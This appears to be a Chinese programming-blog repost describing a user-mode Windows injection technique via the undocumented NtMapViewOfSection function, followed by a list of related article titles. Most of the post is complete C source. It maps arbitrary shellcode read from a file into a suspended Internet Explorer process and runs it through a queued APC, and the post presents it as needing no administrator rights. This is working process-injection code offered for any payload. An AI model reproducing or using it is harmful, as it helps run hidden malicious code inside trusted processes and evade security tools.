0.ring3-NtMapViewOfSection注入
来源:互联网 发布:淘宝生意经 编辑:程序博客网 时间:2024/06/05 00:59
新的注入方式:利用一个未公开函数NtMapViewOfSection在远程进程地址空间写入代码,并且用一种新的技术在远程进程中执行它,这种技术完全工作在用户模式下,并且不需要特殊的条件比如像管理员权限或者之类的要求
#define _WIN32_WINNT 0x0400#include <windows.h>typedef LONG NTSTATUS, *PNTSTATUS;#define NT_SUCCESS(Status) ((NTSTATUS)(Status) >= 0)typedef enum _SECTION_INHERIT {ViewShare = 1,ViewUnmap = 2} SECTION_INHERIT;typedef NTSTATUS (__stdcall *func_NtMapViewOfSection) ( HANDLE, HANDLE, LPVOID, ULONG, SIZE_T, LARGE_INTEGER*, SIZE_T*, SECTION_INHERIT, ULONG, ULONG );func_NtMapViewOfSection NtMapViewOfSection = NULL;LPVOID NTAPI MyMapViewOfFileEx( HANDLE hProcess, HANDLE hFileMappingObject, DWORD dwDesiredAccess, DWORD dwFileOffsetHigh, DWORD dwFileOffsetLow, DWORD dwNumberOfBytesToMap, LPVOID lpBaseAddress ) {NTSTATUS Status;LARGE_INTEGER SectionOffset;ULONG ViewSize;ULONG Protect;LPVOID ViewBase;// 转换偏移量SectionOffset.LowPart = dwFileOffsetLow;SectionOffset.HighPart = dwFileOffsetHigh;// 保存大小和起始地址ViewBase = lpBaseAddress;ViewSize = dwNumberOfBytesToMap;// 转换标志为NT保护属性if (dwDesiredAccess & FILE_MAP_WRITE){Protect = PAGE_READWRITE;}else if (dwDesiredAccess & FILE_MAP_READ){Protect = PAGE_READONLY;}else if (dwDesiredAccess & FILE_MAP_COPY){Protect = PAGE_WRITECOPY;}else{Protect = PAGE_NOACCESS;}//映射区段Status = NtMapViewOfSection(hFileMappingObject,hProcess,&ViewBase,0,0, &SectionOffset,&ViewSize, ViewShare, 0,Protect);if (!NT_SUCCESS(Status)){// 失败return NULL;}//返回起始地址 return ViewBase;}int WINAPI WinMain (HINSTANCE, HINSTANCE, LPSTR, int){HMODULE hDll = LoadLibrary( "ntdll.dll" );NtMapViewOfSection = (func_NtMapViewOfSection) GetProcAddress (hDll, "NtMapViewOfSection");// 取ShellCode,任何你想实现的HANDLE hFile = CreateFile ("C:\\shellcode.txt", GENERIC_READ, 0, NULL, OPEN_EXISTING, FILE_ATTRIBUTE_NORMAL, NULL);HANDLE hMappedFile = CreateFileMapping (hFile, NULL, PAGE_READONLY, 0, 0, NULL);// 启动目标进程STARTUPINFO st; ZeroMemory (&st, sizeof(st));st.cb = sizeof (STARTUPINFO);PROCESS_INFORMATION pi;ZeroMemory (&pi, sizeof(pi));CreateProcess ("C:\\Programme\\Internet Explorer\\iexplore.exe", NULL, NULL, NULL, FALSE, CREATE_SUSPENDED, NULL, NULL, &st, &pi);// 注入shellcode到目标进程地址空间LPVOID MappedFile = MyMapViewOfFileEx (pi.hProcess, hMappedFile, FILE_MAP_READ, 0, 0, 0, NULL);// 创建一个新的能够在目标线程恢复是首先执行的APCQueueUserAPC ((PAPCFUNC) MappedFile, pi.hThread, NULL);ResumeThread (pi.hThread);CloseHandle (hFile);CloseHandle (hMappedFile);CloseHandle (pi.hThread);CloseHandle (pi.hProcess);return 0;}
- 0.ring3-NtMapViewOfSection注入
- ring3-NtMapViewOfSection注入
- 0.ring3-APC注入
- ring3下的注入dll
- Ring3下远程注入DLL干掉IceSword
- ring3层远程注入DLL方法
- Ring3下Dll注入方法整理汇总
- Ring3进程注入技术讲解篇
- Ring3下Dll注入方法整理汇总
- Ring3下Dll注入方法整理汇总
- Ring3下的DLL注入工具
- Windows平台Ring3下DLL注入(HOOK)方法整理汇总
- Windows x86/ x64 Ring3层注入Dll总结
- Windows x86/ x64 Ring3层注入Dll总结
- Ring3层的DLL注入(32)(64)
- 0.ring3-SetWinEventHook和SetWindowsHookEx
- 0.ring3-USER32!__ClientLoadLibrary定位.
- 0.ring3-反调试小结
- SQL Server数据库备份与恢复
- 显示对话框的几种方法
- HDU-1074-Doing Homework
- 输入输出电阻
- [转]浅析http协议、cookies和session机制、浏览器缓存
- 0.ring3-NtMapViewOfSection注入
- django模型字符串字段写mysql字符串的处理
- 精通Visual C++图像编程之位图的特技显示(学习笔记)
- 学生管理系统 重要语句的学习
- Android自定义Dialog显示GridView
- 举例说明如何在android中使用Service
- netlink socket
- 判断CPU是否64位,以及linux操作系统是否64位
- C# FTP 文件 文件夹操作 上传 下载
